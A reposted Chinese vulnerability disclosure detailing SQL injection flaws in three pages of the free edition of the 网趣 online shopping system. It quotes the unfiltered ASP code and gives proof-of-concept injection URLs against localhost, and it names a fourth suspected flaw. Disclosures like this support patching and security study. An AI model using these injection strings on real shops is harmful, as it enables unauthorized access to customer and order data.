网趣网上购物系统旗舰版(免费版)SQL注入漏洞

----------------------------------------------------------------------

版本:网趣网上购物系统旗舰版(免费版)

下载:http://www.cnhww.com/down.asp?id=6

----------------------------------------------------------------------

第一处:

/research.asp

对selectname未进行任何过滤，造成搜索型注入

code：

7-12行

dim action,searchkey,anclassid,jiage,selectname
anclassid=request("anclassid")
searchkey=request("searchkey")
jiage=request("jiage")
action=request("action")
selectname=request("selectname") //获取selectname，中间无任何过滤

212-230行

if anclassid<>0 then   
select case action
case "1"
sql1=" bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and
anclassid="&anclassid&" "
case "2"
sql1=" pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and
anclassid="&anclassid&" "
case "3"
sql1=" bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and
anclassid="&anclassid&" "
end select
else
select case action
case "1"
sql1=" bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") "
case "2"
sql1=" pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") " //我利用的是此处
case "3"
sql1=" bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") "
end select
end if

234行

rs.open "select * from products where "&sql1&"  and zhuangtai=0 order by adddate desc",conn,1,1

构造:

http://127.0.0.1:8080/research.asp?anclassid=0&action=2&jiage=100000&selectname=京润%' and 1=1 and '%'='

--------------------------------------------------------------------

第二处:

/price.asp

对anid未进行任何过滤，造成数字型注入

code:

74行:

anid=trim(request("anid")) //获取anid，中间无任何过滤

104行:

if anid<>"" then
rs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1

构造:

http://127.0.0.1:8080/price.asp?anid=62 and 1=1

---------------------------------------------------------------------

第三处:

/order.asp

对dan未进行任何过滤，造成字符型注入

code:

64行:

dingdan=request.QueryString("dan") //获取dan，中间无任何过滤

66行:

rs.open "select
products.bookid,products.shjiaid,products.bookname,products.shichangjia,products.huiyuanjia,orders.actiondate,orders.shousex,
orders.danjia,orders.feiyong,orders.fapiao,orders.userzhenshiname,orders.shouhuoname,orders.dingdan,orders.youbian,orders.liu
yan,orders.zhifufangshi,orders.songhuofangshi,orders.zhuangtai,orders.zonger,orders.useremail,orders.usertel,orders.shouhuodi
zhi,orders.bookcount from products inner join orders on products.bookid=orders.bookid where
orders.username='"&request.cookies("Cnhww")("username")&"' and dingdan='"&dingdan&"' ",conn,1,1

构造:

下笔订单先，否者无法利用  

http://127.0.0.1:8080/order.asp?dan=201277143453' and '1'='1

----------------------------------------------------------------------

第四处:

/my_msg.asp

对delid未进行任何过滤(我用的免费版，无法测试，不过有很大可能存在该漏洞)

----------------------------------------------------------------------

转自：http://www.90sec.org/thread-3089-1-1.html

留言评论（旧系统）：